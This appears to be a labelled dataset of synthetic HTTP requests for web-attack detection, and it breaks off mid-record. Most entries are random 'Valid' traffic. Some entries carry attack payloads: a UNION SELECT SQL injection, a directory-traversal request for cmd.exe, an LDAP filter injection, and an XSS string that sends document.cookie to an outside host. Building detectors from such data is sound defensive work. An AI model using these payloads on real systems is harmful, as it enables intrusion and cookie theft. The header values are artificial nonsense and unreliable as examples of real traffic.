Accept: audio/x-wav;q=0.8
Accept-Charset: x-mac-greek;q=0.4, utf-8, ks_c_5601-1987, utf-7;q=0.1, iso-8859-4
Accept-Encoding: identity;q=0.4, deflate
Accept-Language: *;q=0.7
Cache-Control: 0uepaLs='I3nb'
Client-ip: 98.129.107.124
Cookie: u8hmhgscr1um=srp;a9vetdenmx3imeh=rzn9qn;re=ew/telnethtaccesw37;oIbcQdManhim= echoA
Cookie2: $Version="1"
Date: Wed, 16 Apr 08 07:46:08 GMT
ETag: W/"zA.OHzOHy3qod35ryO"
Expect: 100-continue
From: ha8nsli@tLng.it
If-Modified-Since: Thu, 03 Jul 08 17:19:20 CET
If-Unmodified-Since: Wed, 09 Nov 05 09:32:55 UTC
If-Match: "pAA.U4JbhhsmeM40"
If-None-Match: "A0S21C.sX6hOjj6n-OMA"
If-Range: "nOA3e4xllOPRGrzj."
Max-Forwards: 50
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: ayD9e codPhMon=eailrU
Authorization: fcsAih atmoE=arde4pW
Range: 083284-20717,966433-49880
Referer: /ploa.cfm
TE: trailers,deflate;q=0.3
Trailer: Proxy-Authorization
User-Agent: eAWw.f http://www.ixrauh.de
UA-CPU: x86
UA-Disp: 065,8353,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 044x401
Via: jon/0.3 62.98.219.103, wfTEt/2.1 www.eeltl.jpeg
Transfer-Encoding: wtmcd; nczeieD=rmg5los
Upgrade: 0oLl/3.2, bNet/5.1, rSmh/6.1, Snn/9.5, oay/4.7
Warning: 517 131.56.155.79 "vsek" "Thu, 13 Jul 06 04:49:53 UTC"
X-Forwarded-For: 141.42.67.105
X-Serial-Number: 26236136
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16997
Start - Id: 27457
class: Valid
GET /c51Eg6o.7v/tlDsomhEatettrosreeh/doyZFQw_m@Ct/aIl/phho6enhu9/yy7gJES/Hc5ninfcsos/iMnMpoKbPgwNzaVKJ.asmx?alnonoarsrv75=rxa68fB&K0qeetbiff=locationa9%26pbgsoundlilegr+rwcrei&6reyenm1e=0iy9ZJ7s56&jeLj=ehrpGhchA8aO&ekoispkeea=566495&lcirjh4=3bhmtrjtansn%27q&lrtdoeiahnve=hPtIPi HTTP/1.1
Host: www.aeenua.de:02
Connection: keep-alive
Accept: image/*, application/*;q=0.1
Accept-Charset: iso-8859-3;q=0.1, windows-874;q=0.8, isiri-3342;q=0.6
Accept-Encoding: compress;q=0.7, deflate, identity;q=0.7
Accept-Language: gb0z-b;q=0.8, a-9Ee, wcn6-ga;q=0.7
Cache-Control: no-transform
Client-ip: 220.74.187.137
Cookie: amrl=2190267540;3RU7o9v=child26Oea9v;ZaOf6tn=ndxh;ie3rdatrcAofEhn=4<a9Orlmmtmpz7;1tlbersojtlzi6=07
Cookie2: $Version="504"
Date: Mon, 22 Nov 04 14:34:02 GMT
ETag: "QtIOcNrTHUCZCQr"
Expect: or93asl=nmiehitp
From: aoeAAN@rgth.net
If-Modified-Since: Fri, 27 Nov 09 09:50:10 CET
If-Unmodified-Since: Thu, 25 Nov 04 13:53:46 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Mar 10 01:58:41 CET
Max-Forwards: 73
MIME-Version: 4.3
Pragma: a='hoty'
Proxy-Authorization: NTLM dXRlZHduZW51Z2NybUszdW5vYWJ0c25yYWF4eWFyb2U=
Authorization: Digest username="am7A"
Range: -23882,10-10,-10053
Referer: /zsoil/ogpiemo/E3ejie.asp
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.9 (X11; U; Open BSD i586 2.2; on-oe; rv:4.3.7) Gecko/30468868
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 802x162
Via: HTTP/7.6 161.47.38.50, aHhik/2.5 www.0rvI.js
Transfer-Encoding: identity
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 71071615969288398
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27457
Start - Id: 1872
class: Valid
GET /l_7hPuZl0VCtz5n_d/9r3hcengjnha5jgfn.php4?bw3PNZtHBd9.=XdppaodR%3Ful HTTP/1.0
Host: www.ibrenutit.st:80
Connection: keep-alive
Accept: video/quicktime, audio/*;q=0.7, video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: ednrl8-tiaem
Cache-Control: no-store
Client-ip: 188.102.222.214
Cookie: 2hHeiNzey6nttGr=ao0vAft:sz4gwheref;g3Ro=2anvi;0eOi=aieasm;dnehseeiesl=2005;rui3le=aVMFV07aU;e5Tabis=030
Cookie2: $Version="278"
Date: Tue, 13 Sep 05 07:03:35 CET
ETag: W/"3C2rID-teD7-_L1s"
Expect: 100-continue
From: drTutr@dotdhai.com
If-Modified-Since: Mon, 28 Jan 08 12:38:02 GMT
If-Unmodified-Since: Mon, 20 Jul 09 18:36:05 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8257
MIME-Version: 9.2
Pragma: hes='e'
Proxy-Authorization: dot0w shDsc1da=rfcu0
Authorization: Basic dGh1dGZzVDpkcEkwU2U=
Range: -4,19022-,558645-4370
Referer: /nteedd3.mpeg
TE: deflate,trailers,trailers
Trailer: Accept
User-Agent: uaeMgHtrdt8dnu
UA-CPU: PowerPC
UA-Disp: 171,774,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 899x371
Via: HTTP/6.4 226.132.215.28:1653, 6.1 190.109.186.138
Transfer-Encoding: iodpdm; eewsp8dg=fLem
Upgrade: ue0/2.4, itqt5/5.4, 6Erms/1.3
Warning: 710 www.63f6T2cn.css "SbabsU" "Tue, 01 Aug 06 20:42:57 GMT"
X-Forwarded-For: 120.197.169.25
X-Serial-Number: 9825967
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1872
Start - Id: 18862
class: Valid
GET /ecyuswcd9o.bin?ssi4ekdnechsS=2&mnonnkts5v8=o2et9etsoz9bcwshm&eInaa75gr8aich=hKMifb8T4p&t2Ttdebraxeix=871560&lDum=t%7CS43wpasswdnode+&stv45t=147&e6tgwiEhijN=59482&tewNekh=o7l7gus&qd4=nselect7da&ofenuT=7738&rsrds=itrhe HTTP/1.1
Host: www.pshhebte.uk:80
Connection: close
Accept: video/quicktime, text/xml, video/mpeg
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress;q=0.8, gzip, identity, deflate;q=0.6
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 123.230.139.164
Cookie: kTtrhn=t/rcM;15cBI=teJW;enadiiAeGi=99eoenetcat;rt=roadxp_=ntwe;ihraadiItbu=D1 iNlo&a2lib;v1U3xfnsXEe=9877887
Cookie2: $Version="00"
Date: Wed, 26 Aug 09 09:38:06 GMT
ETag: "8r6osQIs3RbAiDM2"
Expect: 100-continue
From: oiir0@raaeopgcl.it
If-Modified-Since: Wed, 26 Jul 06 22:14:52 GMT
If-Unmodified-Since: Fri, 15 Apr 05 04:12:45 GMT
If-Match: *
If-None-Match: "5Oy539X7kRzWjPgxWg"
If-Range: Sun, 19 Apr 09 09:57:50 UTC
Max-Forwards: 668
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Basic Z2xucmVpbTpHYXNvdWVrbw==
Authorization: Digest opaque="urietee"
Range: 33-,46-263308
Referer: http://1Afeysio.cz/ngrngT/NKjeluo.nsf
TE: trailers
Trailer: Host
User-Agent: aanxqhise (plsrD-k; 8lEEA5N)
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 534x0427
Via: FTP/1.2 167.233.47.24
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 764 36.12.45.78 "losey4rd3" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 65367829353425279089
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18862
Start - Id: 23096
class: Valid
GET /TpassthruAcG9q0YZ/TadminWwRia3@ZkJ/tpwBoeoclwua/i08r9IN97/hDh/Ey.jpg?e8rccblee=i973r8onEWU&wsf4ishahghAs=Smoih0i4aph2hhmq HTTP/1.0
Host: www.eedrTalb.it
Connection: keep-alive
Accept: application/rtf;q=0.7, video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 44.61.195.169
Cookie: lho=6;oHsarhdsherehE=3k2;hi9hbisPegA1a=m;ypl64DW=78067366
Cookie2: $Version="865"
Date: Mon, 30 Jul 07 22:12:24 GMT
ETag: W/"t15mmUNACPbF9yvF1h8d"
Expect: 100-continue
From: Hocan@osthutarg1.biz
If-Modified-Since: Thu, 16 Jun 05 03:11:57 CET
If-Unmodified-Since: Tue, 07 Apr 09 03:21:33 UTC
If-Match: *
If-None-Match: "AcI1We7ltL0JBO32F6"
If-Range: Fri, 30 Sep 05 05:52:48 UTC
Max-Forwards: 387
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM dHV0YmdEN3B0ZEJlMGU3MWg5dDZPbGFocmUwc3Jnc3Rpb29hZA==
Authorization: NTLM bGRldHNscnNscGFwcmlydzR0OTVnYjlpZm5sYk5hZGFobm5vYnNu
Range: 189-,863-
Referer: /5den/ehaAqk/wvhnlb1/Hymey.tar.gz
TE: gzip;q=0.7,gzip;q=0.3,chunked;q=0.1
Trailer: Connection
User-Agent: taBh (oYU7b4; lqsAUMiGDn; zc7K.7miM)
UA-CPU: Sparc
UA-Disp: 784,1462,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0764x660
Via: 8.1 82.90.212.85
Transfer-Encoding: compress
Upgrade: lN4/4.1, mlbe/9.6, leIed/9.3, per0s/1.6
Warning: 005 154.25.128.144 "pVsqstdnhwftt5otH" 
X-Forwarded-For: 14.112.39.35
X-Serial-Number: 18684889581671575
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23096
Start - Id: 5982
class: Valid
PUT /ng-071w9Ux1.a3qMs8/OiframeSlRpasswdail.ytX/OARDshutdownJK6xwUY/3JLO/wV/sHRUZ/eh/Oeygujmojf6h7i/tLZHDM.HvOjKlh2iZZJ/eCZ2@Vfcpi.mdb? HTTP/1.1
Content-Length: 155
Content-Language: peea,bo4t,gsrn0c
Content-Encoding: identity
Content-Location: http://teiiaogr.it/ntsxacIe/zk8xie/a6Ga/nherft.cgi
Content-MD5: Z1dYRXJpbGg3bWlhRW1zYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Apr 08 02:53:43 GMT
Last-Modified: Tue, 29 Jun 04 07:53:50 CET
Host: www.suh2eenL.gov
Connection: keep-alive
Accept: text/xml, video/*, audio/*;q=0.1
Accept-Charset: iso-8859-15
Accept-Encoding: compress;q=0.6, deflate, gzip
Accept-Language: Igmaheit-lsitewzs;q=0.3, t-ei;q=0.0, Sxhet-neA;q=0.9
Cache-Control: only-if-cached
Client-ip: 157.18.89.84
Cookie: selegOtunf=P@A6include;nLTallTCKhttpswp-Ht=tYxep3@Ry;iv0tboNerplEn0=itRt;iduneoi0=nKmw_cuEN;tetuhrhoS=514986130
Cookie2: $Version="00"
Date: Wed, 10 Nov 04 24:46:36 GMT
ETag: W/"@2rwa41.yZ6O3.dQA"
Expect: rr6iNl
From: aH2oeaxm@3EiRSay.org
If-Modified-Since: Wed, 12 Apr 06 08:22:27 GMT
If-Unmodified-Since: Tue, 29 May 07 20:47:36 UTC
If-Match: "SdMgTHDdD6waJWCZb"
If-None-Match: "RcDU1TSJgj3r0nTH0y"
If-Range: Wed, 25 Jul 07 18:01:21 GMT
Max-Forwards: 09
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest nc=691127d9
Authorization: Basic ZWVlZDppb29hZQ==
Range: 7772-71595
Referer: /eiosmm/9iitrdta.html
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/9.6 (Windows; U; Windows NT 9.7; hs-uw; rv:4.8.3) Gecko/02101406
UA-CPU: PowerPC
UA-Disp: 879,569,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 008x6801
Via: ipnont/0.5 www.dytn.tiff, rip3hF/9.6 175.135.222.50, 4.4 182.123.7.141
Transfer-Encoding: identity
Upgrade: treana/1.3, oher5/3.1
Warning: 803 226.93.188.78:98 "lhtttca3" 
X-Forwarded-For: 232.218.22.35
X-Serial-Number: 913619752558918
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

4oenuo=1023&bA._5U=saYLao8a&2Gq6Ev=77499&d3o1iigchhnioi=sLi4m2BN&2i1w=zCoPCCLmG&ie0wIaE=5465&unie0nxo=rJ4&iSscriptRtnYnetcatxT=evalUDuetqf mcmdaihl&qUw6= o

End - Id: 5982
Start - Id: 41837
class: SqlInjection
GET /tstoraeeexiniOos/co/0oxCK-/neteutmvbhnoufn3st/hWfK5lFe/aVzVN/l7TjRr9S0db/pbm/AhV/s8Pysh4_J/selectJ6-LBTMZRfJt/mDnodeTf_Tprocessing-instructionDHQEpiA.cfm?dasZ=o0tmoptEd&LnxpeW=hcztQat&zheoandgne=aEk&sA=%27++++%29++++UNION++++ALL+SELECT+891%2C557%2C0307%2C093%2C89+++++FROM++qraeTitdea+WHERE+++++%28++++%27%27++%3D+%27&obtmp4wherewB=9467&mtiewts=2ei7-jee HTTP/1.1
Host: 111.36.102.214:80
Connection: close
Accept: application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: rltco-Hs;q=0.0, oijeqta-ahecooN
Cache-Control: no-transform
Client-ip: 196.90.56.27
Cookie: e32TluAeanOesa2=adminalcb;65bnot10ieusm6a=1;5iart=68182;.wK2txUuZQ=0tdt
Cookie2: $Version="58"
Date: Tue, 13 Feb 07 19:21:39 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Mon, 07 Mar 05 04:57:19 UTC
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "UQTd4NV0sSdoUAhnJ1"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 243
MIME-Version: 1.6
Pragma: pncdaVt='fbnaente'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM ZWl0OGdOYWRhbWV1cnRndWcxbnNsdDhvaGdlY2NzdGV5cG1laWFleWlvczZt
Range: -0842
Referer: /Eivo3qh.pl
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 9.5; sr-tt; rv:6.7.3) Gecko/75858259
UA-CPU: 68000
UA-Disp: 658,0030,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: compress
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41837
Start - Id: 34983
class: Valid
POST /hPe/dm2eElhwDypge/p1Wconnectsn/3cayrfibTeeds/vEy/Io05tttS/3ew7dbnUoaskerak.jsp? HTTP/1.0
Content-Length: 74
Content-Language: hl
Content-Encoding: deflate
Content-Location: http://4sooA.net/hdtoen/a3ip/Uoeifn.jpg
Content-MD5: OWhXbGxzamlkcmx0Zm5lZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 14 Dec 09 16:52:58 CET
Last-Modified: Sun, 14 Jun 09 20:03:48 UTC
Host: 184.198.206.205
Connection: keep-alive
Accept: text/*;q=0.7, audio/basic, audio/*
Accept-Charset: big5;q=0.8, windows-1254, x-mac-chinesesimp
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 62.227.251.73
Cookie: dk=383231;bh=97327;Woc9qtateagwea8=int8efta6f
Cookie2: $Version="223"
Date: Thu, 25 Oct 07 16:19:02 UTC
ETag: "1kfBhpX0sKia-RO"
Expect: hxsoa3en=shlmntit
From: Jfon@lR0e.de
If-Modified-Since: Tue, 28 Jun 05 03:28:05 CET
If-Unmodified-Since: Sun, 03 Aug 08 15:34:58 UTC
If-Match: "YV236VnoAbBwylTM0a"
If-None-Match: "ug@PR455V7hZ2_azQm"
If-Range: Thu, 20 Apr 06 04:32:26 UTC
Max-Forwards: 3
MIME-Version: 5.8
Pragma: Ay=s9
Proxy-Authorization: rt0shl Adopt=uaeh
Authorization: NTLM U3FhNmE5cmllb2Z0ZXN0b2lzZXJlcGhYMG5vWnI0cnM3ZXRhZVB0eG5pMQ==
Range: 364064-7831,-653,14-
Referer: http://www.bdxrfwt.ch/olTnai/34pNe/giuRste/eenodees.mdb
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.9 (Windows; U; Windows NT 2.7; le-es; rv:3.4.3) Gecko/85718872
UA-CPU: StrongARM
UA-Disp: 3992,5173,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1234x075
Via: HTTP/9.1 121.111.162.135:54
Transfer-Encoding: gzip
Upgrade: ku3hm/3.0, alouf/9.2
Warning: 585 242.163.219.88:39711 "liupeie" "Sat, 02 Feb 08 03:16:08 GMT"
X-Forwarded-For: 90.170.127.145
X-Serial-Number: 94870526636220285
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aiootpnisTeu=96&hpoe=alnfneetc&sss2giN=>ltl%q t&PWrropenunionZ3=aceznt

End - Id: 34983
Start - Id: 6559
class: Valid
POST /jfzesFYJeCW/etM3eeit/Rv/ewqC0Sv6alX/bnnarectntevasmnaFNo/yMina6j/KHVH3_R/eroEd/decdt/waose0lfmEone/stlytasNub2RmO.jsp? HTTP/1.1
Content-Length: 15
Content-Language: shwap,i4v
Content-Encoding: compress
Content-Location: /luh7yo/EEsspsni.dll
Content-MD5: dGFtbThoa0Q2eUQ4MXRsYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 Jul 06 07:50:53 CET
Last-Modified: Tue, 14 Oct 08 17:43:26 GMT
Host: 14.25.57.148
Connection: close
Accept: application/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: identity, deflate;q=0.5, identity;q=0.4, identity;q=0.1, gzip
Accept-Language: eo8mt-se, Mt-rRoo;q=0.8, thaubylk-5;q=0.8, h-li, tthsoohl-nietb;q=0.2
Cache-Control: no-transform
Client-ip: 243.8.236.59
Cookie: xp_JZz.ZvrcpM0=hVJP;rprROrqVo8raodn=6969035;r8JarAJdxtermz-=srp4thu4etteb;afsqncnCiu=chry6soReniOIeeth;etbsenppna6oNe=s0SouQeewk
Cookie2: $Version="01"
Date: Sun, 02 Dec 07 11:43:11 CET
ETag: W/"jJMLzmXssWkyuW6vjiJU"
Expect: rtIode=sanniu
From: o8eejmn@senavr.com
If-Modified-Since: Fri, 23 Mar 07 12:55:44 GMT
If-Unmodified-Since: Sun, 25 Feb 07 17:08:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 4.4
Pragma: 2sssre='yNcEfIo'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM bWFndGVzSmVyaTRPNDN0ZWFlc2VtaWVpc3luTm8zcDZlYXI0aGllaDJa
Range: -45,964658-8
Referer: http://www.t1miote.st/Oitxeig/sreitu3C/nrnbp/ehmau.nsf
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/4.3 (Windows; U; Win98 7.6; wr-lb; rv:6.4.6) Gecko/54508666
UA-CPU: 68000
UA-Disp: 7851,1243,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 578x446
Via: HTTP/2.0 51.93.229.144, 6.8 www.r1de4.css:33, smdd/6.0 174.208.181.84
Transfer-Encoding: identity
Upgrade: p5a/1.7, bTrr5a/4.4
Warning: 564 www.0s1hnl.jpeg "naAntihfn" "Sun, 18 Oct 09 08:25:03 UTC"
X-Forwarded-For: 146.62.72.175
X-Serial-Number: 552358
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ee2ernjres=z1hO

End - Id: 6559
Start - Id: 44096
class: OsCommanding
GET ..%%35c../..%%35c../..%35c../..%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: www.serlche.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=1814
Client-ip: 236.2.174.53
Cookie: iiirRb1eno=eITlig3aegeOeb;Roinetofoohn=eOtsE oso;ynwemts=9282433;ouNnc=5
Cookie2: $Version="94"
Date: Sun, 08 Aug 04 15:41:13 UTC
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: ixam@eaec.uk
If-Modified-Since: Sat, 12 Dec 09 08:37:36 GMT
If-Unmodified-Since: Mon, 12 Dec 05 15:02:44 GMT
If-Match: *
If-None-Match: "V3Ha_YMdBSMA-AvjJ"
If-Range: Wed, 23 Sep 09 08:41:21 UTC
Max-Forwards: 5022
MIME-Version: 0.4
Pragma: msG='Alw'
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic dHBhd3JkNWk6ZTNodGFJ
Range: 70-
Referer: http://www.leLirnr.gov/Ovgnetl/eeha4cn.zip
TE: chunked
Trailer: If-Match
User-Agent: Mozilla/6.8 (X11; U; Linux i386 1.7; cs-oj; rv:8.7.4) Gecko/99512930
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: HTTP/3.0 135.149.112.57
Transfer-Encoding: hOUe
Upgrade: unHis2/9.7, sDw/8.7
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44096
Start - Id: 38233
class: LdapInjection
GET /fF/tcT4J3inetcat/tHoOCGc1cD/t4exnwouAiyetrwnvoui/5HoQgv4U5NZLXoISf/Ztm7Y3EJSC@-/aGQHT27/sWfwfHkbLVt41eL8-Y@5/iJjux_/oX1zfozaXmdFaj0iW.mdb?nrqen=t_F&knaersEeaUag=2&dyt3sf=bud8yoditD6itB&mwAac=6271826304&nZhnqae=dropboot.iniIdh%5ClD%3F3mHnal+dnt&tcriiayo=24198279&hwsrujed=o3p%29%28%26%28objectClass+++%3DrS*%29&ltio468etrr=5isxd&FimghttpswAYhQU=Yi4sjyiEzoNree7R&lenme=26480&LWb.WxyXGcmd=satz7yascgicaer2ie&llhdE=1tautoexecslopengnbta HTTP/1.1
Host: www.H7nud5.biz:5
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=42434
Client-ip: 243.207.220.22
Cookie: Gdgs3e-r-=DuCltaPasca;eYtoep9csHiE=oi6q
Cookie2: $Version="541"
Date: Sun, 22 Feb 09 18:15:15 CET
ETag: W/"pNPv_Emey7cK.eo-"
Expect: PCps
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Mon, 03 Dec 07 13:01:25 GMT
If-Unmodified-Since: Sat, 20 Sep 08 22:12:58 UTC
If-Match: "3nsYqJH_6IwPY.6A"
If-None-Match: "mNBe@xPBirAXBjwl"
If-Range: *
Max-Forwards: 27
MIME-Version: 6.4
Pragma: eertnoe=iur
Proxy-Authorization: Nlgsa fhhoo=he5e
Authorization: Digest response="7228C9B3bAD3ED01ffc7bEA9B4f6CEfd"
Range: 78286-,609503-,160-
Referer: /tte3/shtSt/0ngiu8e/tzltoi.pl
TE: trailers,deflate
Trailer: Connection
User-Agent: 1ptLdhas4l0hRpae
UA-CPU: StrongARM
UA-Disp: 388,3742,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 835x0812
Via: HTTP/4.7 www.ncgnltyE.html
Transfer-Encoding: compress
Upgrade: gcslf/0.5, byhs/2.3, tt7d/1.7
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38233
Start - Id: 47398
class: XSS
GET /oe/3n7m1HcatLX4HhV.nsf?Io8bnk6itama=ehyriiDzhacoelo4&oxye1me7oe=7i6cb&i2s=%3Cimg+++++src%3D++++%22+++mocha%3A%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.meenlais.com%2Fcgi-bin%2Fenalve.cgi%27%2Bdocument.cookie%29%3B%5D+%22+++%3E&aveentj8=tntl&AWVE2Ct=54&ht=%5D++%3B%2Bhsn7%5Blogwh%2F&mrEtEogexsse=i%3Dusrd&ratritetagrt=1586&lo6wERoo=thavingn&w6o=prelog3&auwt8nsoelbrmb0=fJrNi&osabyr=suy8vKTJc0w0&ytrPUn=81019&nauoyhCrtnlun=159&geulbe=ini HTTP/1.0
Host: 146.201.114.103:502
Connection: close
Accept: image/*, audio/*
Accept-Charset: cp-936;q=0.1, x-mac-chinesetrad, big5, iso-8859-8-i;q=0.4
Accept-Encoding: 
Accept-Language: caesm-3syopTo, lbhdfl-lerwNes3, rsARos-bshihyn;q=0.6
Cache-Control: no-store
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Sun, 22 Mar 09 14:56:16 GMT
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Tue, 31 Mar 09 05:53:42 UTC
If-Match: "DGEqqFou1F_O41rZkQ"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 7077
MIME-Version: 0.3
Pragma: Rieev='ra'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: nltq a0s8=xoEe
Range: 3529-807061,329-36,-0646
Referer: http://www.dboraal.ch/rionibhp.mdb
TE: trailers,deflate;q=0.2
Trailer: Expect
User-Agent: Mozilla/2.0 (X11; U; Unix 3.0; le-Ic; rv:0.6.0) Gecko/85698697
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/8.2 www.cesEt6.css:17, 2.4 117.124.89.41:87271, 3.6 www.7tgnfle.jpg
Transfer-Encoding: idune
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 805 www.etFooy.png "eaacsEipcsy" "Tue, 21 Sep 04 14:03:42 CET"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47398
Start - Id: 7995
class: Valid
POST /ta03yOlrF/7TEgprsnMtddcacc/aloe6ox41/itkjvnkeP8NjHM9riiTN.png? HTTP/1.0
Content-Length: 233
Content-Language: roEsI,i
Content-Encoding: identity
Content-Location: /tfec.avi
Content-MD5: c2Fzc2ZnZXdtdDlrYmYzbA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 04 Dec 07 05:38:47 GMT
Last-Modified: Sun, 05 Oct 08 20:10:10 CET
Host: 64.137.244.105
Connection: dftet
Accept: audio/basic
Accept-Charset: windows-1252, windows-1253
Accept-Encoding: 
Accept-Language: ae-ygtiozr, eeivz-t;q=0.6
Cache-Control: max-age=4
Client-ip: 127.85.13.89
Cookie: poeAphncwa=i7VCC1;soepejfwu2yty=3503;hit=r7A-956m;Toeemmrv=cuhmyjFHndton;awuev2hb=53651;xrpxzrlhLf=n flp
Cookie2: $Version="792"
Date: Tue, 04 Sep 07 15:25:57 GMT
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: Eddfxa=scttne
From: Scez@aoailhel.gov
If-Unmodified-Since: Sun, 08 Aug 04 07:10:22 CET
If-Match: "GeN0MoFaKkKggJW"
If-None-Match: "6Ou---bHosJpPAvBMBQ"
If-Range: *
Max-Forwards: 0
Pragma: aemwtigu=ttequ1
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: Digest nonce
Range: 439-82,94-,67-
Referer: /pjopa/7he6Wz.bin
TE: trailers,deflate;q=0.0,trailers
Trailer: Upgrade
User-Agent: Mozilla/0.2 (compatible; MSIE 1.2; Win98; lnovucse; 1taswc; wtsn)
UA-CPU: PowerPC
UA-Disp: 0381,3686,16
UA-OS: Linux
UA-Color: color16
Via: ystt/0.9 29.59.91.108, 8.0 www.btrsgOn.shtml
Transfer-Encoding: deflate
Upgrade: eVa/3.0, stanf/7.6, t9meea/9.9
